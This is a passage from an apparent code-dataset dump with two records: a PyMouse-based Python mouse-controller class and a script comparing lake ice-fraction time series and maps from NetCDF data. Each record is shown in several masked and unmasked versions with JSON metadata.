d = marks[0][1] - marks[-1][1]
R = 0.2
print(d)
if d > R:
m.scroll(-1)
elif d < -R:
m.scroll(1)
def press(self, xy: list, ones=True):
"""
长按
"""
if ones:
m.press(xy[0] * w, xy[1] * h)
else:
m.drag(xy[0] * w, xy[1] * h)
def release(self, xy: list):
"""
松开
"""
m.release(xy[0] * w, xy[1] * h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
<|reserved_special_token_1|>
from pymouse import PyMouse
m = PyMouse()
w, h = m.screen_size()
class base_controller:
def __init__(self):
pass
def move(self, xy: list):
"""
移动
"""
m.move(xy[0] * w, xy[1] * h)
def click(self, xy: list):
"""
点击
"""
m.click(xy[0] * w, xy[1] * h)
def scroll(self, marks: list):
"""
滚动
"""
d = marks[0][1] - marks[-1][1]
R = 0.2
print(d)
if d > R:
m.scroll(-1)
elif d < -R:
m.scroll(1)
def press(self, xy: list, ones=True):
"""
长按
"""
if ones:
m.press(xy[0] * w, xy[1] * h)
else:
m.drag(xy[0] * w, xy[1] * h)
def release(self, xy: list):
"""
松开
"""
m.release(xy[0] * w, xy[1] * h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
<|reserved_special_token_1|>
from pymouse import PyMouse
# Shared PyMouse instance and the physical screen size in pixels; the
# controller methods below take coordinates normalized to [0, 1] and scale
# them by (w, h).
m = PyMouse()
w,h = m.screen_size()
class base_controller:
    """Mouse controller whose methods take positions normalized to [0, 1]."""

    def __init__(self):
        pass

    def move(self, xy: list):
        """Move the pointer to the normalized position ``xy``."""
        m.move(xy[0] * w, xy[1] * h)

    def click(self, xy: list):
        """Click at the normalized position ``xy``."""
        m.click(xy[0] * w, xy[1] * h)

    def scroll(self, marks: list):
        """Scroll up or down based on the vertical travel across ``marks``."""
        travel = marks[0][1] - marks[-1][1]
        threshold = 0.2
        print(travel)
        if travel > threshold:
            m.scroll(-1)
        elif travel < -threshold:
            m.scroll(1)

    def press(self, xy: list, ones=True):
        """Press the button at ``xy``; drag to ``xy`` instead when ``ones`` is False."""
        target = (xy[0] * w, xy[1] * h)
        if ones:
            m.press(*target)
        else:
            m.drag(*target)

    def release(self, xy: list):
        """Release the button at the normalized position ``xy``."""
        m.release(xy[0] * w, xy[1] * h)
class mac_controller(base_controller):
    """macOS variant of the controller; currently identical to the base class."""

    def __init__(self):
        super().__init__()
|
flexible
|
{
"blob_id": "b2f2f1e4b7070ac867b71e538f759e527eb1ffb9",
"index": 416,
"step-1": "<mask token>\n\n\nclass base_controller:\n <mask token>\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n <mask token>\n <mask token>\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-2": "<mask token>\n\n\nclass base_controller:\n <mask token>\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-3": "<mask token>\nm = PyMouse()\nw, h = m.screen_size()\n\n\nclass base_controller:\n\n def __init__(self):\n pass\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-4": "from pymouse import PyMouse\nm = PyMouse()\nw, h = m.screen_size()\n\n\nclass base_controller:\n\n def __init__(self):\n pass\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-5": "from pymouse import PyMouse\nm = PyMouse()\nw,h = m.screen_size()\n\nclass base_controller:\n def __init__(self):\n pass\n\n def move(self,xy:list):\n '''\n 移动\n '''\n m.move(xy[0]*w,xy[1]*h)\n \n def click(self, xy:list):\n '''\n 点击\n '''\n m.click(xy[0]*w,xy[1]*h)\n \n def scroll(self, marks:list):\n '''\n 滚动\n '''\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy:list, ones = True):\n '''\n 长按\n '''\n if ones:\n m.press(xy[0]*w,xy[1]*h)\n else:\n m.drag(xy[0]*w,xy[1]*h)\n\n def release(self, xy:list):\n '''\n 松开\n '''\n m.release(xy[0]*w,xy[1]*h)\n\n\nclass mac_controller(base_controller):\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-ids": [
6,
8,
10,
11,
12
]
}
|
[
6,
8,
10,
11,
12
] |
from datetime import datetime
import xarray
import matplotlib.pyplot as plt
import pandas as pd
from matplotlib.dates import date2num
import numpy as np
from matplotlib.gridspec import GridSpec
def test_plot_area_avg(target_nc_folder="", source_nc_path=""):
    """Compare area-averaged lake ice fraction from the source data and HLES output.

    Reads the original ice-cover field ("LC") from ``source_nc_path`` and the
    ``lake_ice_fraction`` written by the lake-effect algorithm to the daily
    files in ``target_nc_folder``, reduces both to area-mean time series over
    the common period, and plots them one above the other.
    """

    def _area_means(fields):
        # Spatial mean of each time slice; NaN when the slice is fully masked.
        return [(f[~f.mask].mean() if not np.all(f.mask) else np.nan) for f in fields]

    src_da = xarray.open_dataset(source_nc_path)["LC"]
    assert isinstance(src_da, xarray.DataArray)
    src_da = src_da.where((src_da >= 0) & (src_da <= 1))  # keep valid fractions only

    src_fields = src_da.to_masked_array(copy=False)  # dimensions: (t, x, y)
    src_times = pd.to_datetime(src_da.coords["time"].values.tolist())
    s_source = pd.Series(data=_area_means(src_fields), index=src_times)

    lkeff_da = xarray.open_mfdataset(target_nc_folder + "/*daily.nc")["lake_ice_fraction"]
    lkeff_times = pd.to_datetime(lkeff_da.coords["t"].values.tolist())
    s_lkeff = pd.Series(_area_means(lkeff_da.to_masked_array(copy=False)), index=lkeff_times)

    # Restrict the source series to the period covered by the HLES output.
    in_period = (s_source.index >= lkeff_times[0]) & (s_source.index <= lkeff_times[-1])
    s_source = s_source[in_period]
    assert isinstance(s_source, pd.Series)

    print(f"Source: len={len(s_source)}")
    print(f"Lkeff: len={len(s_lkeff)}")

    # Two stacked panels sharing the time axis.
    fig = plt.figure()
    gs = GridSpec(2, 1)

    ax = fig.add_subplot(gs[0, 0])
    s_source.plot(ax=ax, marker=".", linestyle="None", label="original")
    ax.legend()

    ax = fig.add_subplot(gs[1, 0], sharex=ax)
    s_lkeff.plot(ax=ax, marker=".", linestyle="None", label="lkeff")
    ax.legend()
    # plt.show()
def __print_field_stats(tfield, field, label):
    """Print min/max/mean/std of the unmasked values of ``field``.

    ``tfield`` is the timestamp shown in the header line and ``label`` names
    the dataset; a placeholder message is printed when every value is masked.
    """
    valid = ~field.mask
    if not np.any(valid):
        print(f"{label}: no meaningful data")
        return
    values = field[valid]
    stats = (
        f"{label} {tfield}:\n"
        f"{values.min()}...{values.max()}\n"
        f"mean={values.mean()}\n"
        f"std={values.std()}\n"
    )
    print(stats)
    print("-" * 20)
def test_plot_maps(target_nc_folder, source_nc_path=""):
    """Plot source vs. HLES-output ice-fraction maps side by side, day by day.

    For each time step after 1981-01-01 that both datasets cover, shows the
    original "LC" field next to the algorithm's "lake_ice_fraction" field,
    prints field statistics for both, and flags days whose area means differ.
    Blocks on plt.show() once per time step.
    """
    # target_nc_folder = "/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_1980-2009"
    # target_nc_folder = "/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1980-1981_test1"
    ice_fr = xarray.open_dataset(source_nc_path)["LC"]
    assert isinstance(ice_fr, xarray.DataArray)
    # Keep only physically valid ice fractions; everything else becomes NaN.
    ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))

    start_date = datetime(1981, 1, 1)

    # t, x, y
    source_data = ice_fr.to_masked_array(copy=False)
    source_time = ice_fr.coords["time"]
    source_time = pd.to_datetime(source_time.values.tolist())

    ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + "/*daily.nc")["lake_ice_fraction"]
    lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)
    lkeff_time = pd.to_datetime(ice_fr_lkeff.coords["t"].values.tolist())

    # select from lkeff data: drop everything before start_date
    lkeff_time_sel = []
    lkeff_data_sel = []
    for t, afield in zip(lkeff_time, lkeff_data):
        if t < start_date:
            continue

        lkeff_time_sel.append(t)
        lkeff_data_sel.append(afield)

    lkeff_time = lkeff_time_sel
    lkeff_data = lkeff_data_sel

    # Select from the source time and data: keep the period spanned by lkeff
    source_data_sel = []
    source_time_sel = []
    for t, afield in zip(source_time, source_data):
        if lkeff_time[0] <= t <= lkeff_time[-1]:
            source_data_sel.append(afield)
            source_time_sel.append(t)

    gs = GridSpec(1, 2)
    # NOTE(review): the loop below pairs the two selections by position and
    # assumes they have the same length and aligned dates — if the datasets
    # have gaps this would misalign or raise IndexError; verify upstream data.
    for i in range(len(source_time_sel)):

        ts = source_time_sel[i]
        tl = lkeff_time[i]

        data_s = source_data_sel[i]
        data_l = lkeff_data[i]

        fig = plt.figure(figsize=(20, 10))

        # Left panel: the original (source) ice fraction field.
        ax = fig.add_subplot(gs[0, 0])
        ax.set_title(f"Source if: {ts}")
        cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))
        plt.colorbar(cs, ax=ax)

        # Right panel: the ice fraction carried through the HLES algorithm.
        ax = fig.add_subplot(gs[0, 1])
        ax.set_title(f"Lkeff if: {tl}")
        cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))
        plt.colorbar(cs, ax=ax)

        print("*" * 20)
        __print_field_stats(ts, data_s, "source")
        __print_field_stats(tl, data_l, "lkeff")
        print("*" * 20)

        # Flag any day where the area-mean ice fractions disagree.
        ms = data_s[~data_s.mask].mean()
        ml = data_l[~data_l.mask].mean()

        if ms != ml:
            print(f"ms={ms}; ml={ml}")

        plt.show()
        plt.close(fig)
def main():
target_nc_folder = "/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981"
# source_nc_path = "/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260/cis_nic_glerl_interpolated_lc.nc"
source_nc_path = "/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc"
test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=source_nc_path)
# test_plot_maps(target_nc_folder=target_nc_folder, source_nc_path=source_nc_path)
plt.show()
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "2d5e147b081283047cd044746d73d91ee2e59052",
"index": 4139,
"step-1": "<mask token>\n\n\ndef __print_field_stats(tfield, field, label):\n good_mask = ~field.mask\n if not np.any(good_mask):\n print(f'{label}: no meaningful data')\n return\n good_data = field[good_mask]\n print(\n f\"\"\"{label} {tfield}:\n{good_data.min()}...{good_data.max()}\nmean={good_data.mean()}\nstd={good_data.std()}\n\"\"\"\n )\n print('-' * 20)\n\n\ndef test_plot_maps(target_nc_folder, source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n start_date = datetime(1981, 1, 1)\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n lkeff_time_sel = []\n lkeff_data_sel = []\n for t, afield in zip(lkeff_time, lkeff_data):\n if t < start_date:\n continue\n lkeff_time_sel.append(t)\n lkeff_data_sel.append(afield)\n lkeff_time = lkeff_time_sel\n lkeff_data = lkeff_data_sel\n source_data_sel = []\n source_time_sel = []\n for t, afield in zip(source_time, source_data):\n if lkeff_time[0] <= t <= lkeff_time[-1]:\n source_data_sel.append(afield)\n source_time_sel.append(t)\n gs = GridSpec(1, 2)\n for i in range(len(source_time_sel)):\n ts = source_time_sel[i]\n tl = lkeff_time[i]\n data_s = source_data_sel[i]\n data_l = lkeff_data[i]\n fig = plt.figure(figsize=(20, 10))\n ax = fig.add_subplot(gs[0, 0])\n ax.set_title(f'Source if: {ts}')\n cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n ax = fig.add_subplot(gs[0, 1])\n ax.set_title(f'Lkeff if: {tl}')\n cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n print('*' * 20)\n __print_field_stats(ts, data_s, 'source')\n 
__print_field_stats(tl, data_l, 'lkeff')\n print('*' * 20)\n ms = data_s[~data_s.mask].mean()\n ml = data_l[~data_l.mask].mean()\n if ms != ml:\n print(f'ms={ms}; ml={ml}')\n plt.show()\n plt.close(fig)\n\n\ndef main():\n target_nc_folder = (\n '/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981'\n )\n source_nc_path = (\n '/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc'\n )\n test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=\n source_nc_path)\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_plot_area_avg(target_nc_folder='', source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n s_source = pd.Series(data=[(field[~field.mask].mean() if not np.all(\n field.mask) else np.nan) for field in source_data], index=source_time)\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n s_lkeff = pd.Series([(field[~field.mask].mean() if not np.all(field.\n mask) else np.nan) for field in lkeff_data], index=lkeff_time)\n s_source = s_source[(s_source.index <= lkeff_time[-1]) & (s_source.\n index >= lkeff_time[0])]\n assert isinstance(s_source, pd.Series)\n print(f'Source: len={len(s_source)}')\n print(f'Lkeff: len={len(s_lkeff)}')\n fig = plt.figure()\n gs = GridSpec(2, 1)\n ax = fig.add_subplot(gs[0, 0])\n s_source.plot(ax=ax, marker='.', linestyle='None', label='original')\n ax.legend()\n ax = fig.add_subplot(gs[1, 0], sharex=ax)\n s_lkeff.plot(ax=ax, marker='.', linestyle='None', label='lkeff')\n ax.legend()\n\n\ndef __print_field_stats(tfield, field, label):\n good_mask = ~field.mask\n if not np.any(good_mask):\n print(f'{label}: no meaningful data')\n return\n good_data = field[good_mask]\n print(\n f\"\"\"{label} {tfield}:\n{good_data.min()}...{good_data.max()}\nmean={good_data.mean()}\nstd={good_data.std()}\n\"\"\"\n )\n print('-' * 20)\n\n\ndef test_plot_maps(target_nc_folder, source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n start_date = datetime(1981, 1, 1)\n 
source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n lkeff_time_sel = []\n lkeff_data_sel = []\n for t, afield in zip(lkeff_time, lkeff_data):\n if t < start_date:\n continue\n lkeff_time_sel.append(t)\n lkeff_data_sel.append(afield)\n lkeff_time = lkeff_time_sel\n lkeff_data = lkeff_data_sel\n source_data_sel = []\n source_time_sel = []\n for t, afield in zip(source_time, source_data):\n if lkeff_time[0] <= t <= lkeff_time[-1]:\n source_data_sel.append(afield)\n source_time_sel.append(t)\n gs = GridSpec(1, 2)\n for i in range(len(source_time_sel)):\n ts = source_time_sel[i]\n tl = lkeff_time[i]\n data_s = source_data_sel[i]\n data_l = lkeff_data[i]\n fig = plt.figure(figsize=(20, 10))\n ax = fig.add_subplot(gs[0, 0])\n ax.set_title(f'Source if: {ts}')\n cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n ax = fig.add_subplot(gs[0, 1])\n ax.set_title(f'Lkeff if: {tl}')\n cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n print('*' * 20)\n __print_field_stats(ts, data_s, 'source')\n __print_field_stats(tl, data_l, 'lkeff')\n print('*' * 20)\n ms = data_s[~data_s.mask].mean()\n ml = data_l[~data_l.mask].mean()\n if ms != ml:\n print(f'ms={ms}; ml={ml}')\n plt.show()\n plt.close(fig)\n\n\ndef main():\n target_nc_folder = (\n '/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981'\n )\n source_nc_path = (\n '/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc'\n )\n test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=\n source_nc_path)\n 
plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef test_plot_area_avg(target_nc_folder='', source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n s_source = pd.Series(data=[(field[~field.mask].mean() if not np.all(\n field.mask) else np.nan) for field in source_data], index=source_time)\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n s_lkeff = pd.Series([(field[~field.mask].mean() if not np.all(field.\n mask) else np.nan) for field in lkeff_data], index=lkeff_time)\n s_source = s_source[(s_source.index <= lkeff_time[-1]) & (s_source.\n index >= lkeff_time[0])]\n assert isinstance(s_source, pd.Series)\n print(f'Source: len={len(s_source)}')\n print(f'Lkeff: len={len(s_lkeff)}')\n fig = plt.figure()\n gs = GridSpec(2, 1)\n ax = fig.add_subplot(gs[0, 0])\n s_source.plot(ax=ax, marker='.', linestyle='None', label='original')\n ax.legend()\n ax = fig.add_subplot(gs[1, 0], sharex=ax)\n s_lkeff.plot(ax=ax, marker='.', linestyle='None', label='lkeff')\n ax.legend()\n\n\ndef __print_field_stats(tfield, field, label):\n good_mask = ~field.mask\n if not np.any(good_mask):\n print(f'{label}: no meaningful data')\n return\n good_data = field[good_mask]\n print(\n f\"\"\"{label} {tfield}:\n{good_data.min()}...{good_data.max()}\nmean={good_data.mean()}\nstd={good_data.std()}\n\"\"\"\n )\n print('-' * 20)\n\n\ndef test_plot_maps(target_nc_folder, source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n start_date = datetime(1981, 1, 1)\n 
source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n lkeff_time_sel = []\n lkeff_data_sel = []\n for t, afield in zip(lkeff_time, lkeff_data):\n if t < start_date:\n continue\n lkeff_time_sel.append(t)\n lkeff_data_sel.append(afield)\n lkeff_time = lkeff_time_sel\n lkeff_data = lkeff_data_sel\n source_data_sel = []\n source_time_sel = []\n for t, afield in zip(source_time, source_data):\n if lkeff_time[0] <= t <= lkeff_time[-1]:\n source_data_sel.append(afield)\n source_time_sel.append(t)\n gs = GridSpec(1, 2)\n for i in range(len(source_time_sel)):\n ts = source_time_sel[i]\n tl = lkeff_time[i]\n data_s = source_data_sel[i]\n data_l = lkeff_data[i]\n fig = plt.figure(figsize=(20, 10))\n ax = fig.add_subplot(gs[0, 0])\n ax.set_title(f'Source if: {ts}')\n cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n ax = fig.add_subplot(gs[0, 1])\n ax.set_title(f'Lkeff if: {tl}')\n cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n print('*' * 20)\n __print_field_stats(ts, data_s, 'source')\n __print_field_stats(tl, data_l, 'lkeff')\n print('*' * 20)\n ms = data_s[~data_s.mask].mean()\n ml = data_l[~data_l.mask].mean()\n if ms != ml:\n print(f'ms={ms}; ml={ml}')\n plt.show()\n plt.close(fig)\n\n\ndef main():\n target_nc_folder = (\n '/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981'\n )\n source_nc_path = (\n '/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc'\n )\n test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=\n source_nc_path)\n 
plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from datetime import datetime\nimport xarray\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib.dates import date2num\nimport numpy as np\nfrom matplotlib.gridspec import GridSpec\n\n\ndef test_plot_area_avg(target_nc_folder='', source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n s_source = pd.Series(data=[(field[~field.mask].mean() if not np.all(\n field.mask) else np.nan) for field in source_data], index=source_time)\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n s_lkeff = pd.Series([(field[~field.mask].mean() if not np.all(field.\n mask) else np.nan) for field in lkeff_data], index=lkeff_time)\n s_source = s_source[(s_source.index <= lkeff_time[-1]) & (s_source.\n index >= lkeff_time[0])]\n assert isinstance(s_source, pd.Series)\n print(f'Source: len={len(s_source)}')\n print(f'Lkeff: len={len(s_lkeff)}')\n fig = plt.figure()\n gs = GridSpec(2, 1)\n ax = fig.add_subplot(gs[0, 0])\n s_source.plot(ax=ax, marker='.', linestyle='None', label='original')\n ax.legend()\n ax = fig.add_subplot(gs[1, 0], sharex=ax)\n s_lkeff.plot(ax=ax, marker='.', linestyle='None', label='lkeff')\n ax.legend()\n\n\ndef __print_field_stats(tfield, field, label):\n good_mask = ~field.mask\n if not np.any(good_mask):\n print(f'{label}: no meaningful data')\n return\n good_data = field[good_mask]\n print(\n f\"\"\"{label} {tfield}:\n{good_data.min()}...{good_data.max()}\nmean={good_data.mean()}\nstd={good_data.std()}\n\"\"\"\n )\n print('-' * 20)\n\n\ndef test_plot_maps(target_nc_folder, source_nc_path=''):\n ice_fr 
= xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n start_date = datetime(1981, 1, 1)\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n lkeff_time_sel = []\n lkeff_data_sel = []\n for t, afield in zip(lkeff_time, lkeff_data):\n if t < start_date:\n continue\n lkeff_time_sel.append(t)\n lkeff_data_sel.append(afield)\n lkeff_time = lkeff_time_sel\n lkeff_data = lkeff_data_sel\n source_data_sel = []\n source_time_sel = []\n for t, afield in zip(source_time, source_data):\n if lkeff_time[0] <= t <= lkeff_time[-1]:\n source_data_sel.append(afield)\n source_time_sel.append(t)\n gs = GridSpec(1, 2)\n for i in range(len(source_time_sel)):\n ts = source_time_sel[i]\n tl = lkeff_time[i]\n data_s = source_data_sel[i]\n data_l = lkeff_data[i]\n fig = plt.figure(figsize=(20, 10))\n ax = fig.add_subplot(gs[0, 0])\n ax.set_title(f'Source if: {ts}')\n cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n ax = fig.add_subplot(gs[0, 1])\n ax.set_title(f'Lkeff if: {tl}')\n cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n print('*' * 20)\n __print_field_stats(ts, data_s, 'source')\n __print_field_stats(tl, data_l, 'lkeff')\n print('*' * 20)\n ms = data_s[~data_s.mask].mean()\n ml = data_l[~data_l.mask].mean()\n if ms != ml:\n print(f'ms={ms}; ml={ml}')\n plt.show()\n plt.close(fig)\n\n\ndef main():\n target_nc_folder = (\n '/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981'\n )\n source_nc_path = (\n 
'/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc'\n )\n test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=\n source_nc_path)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
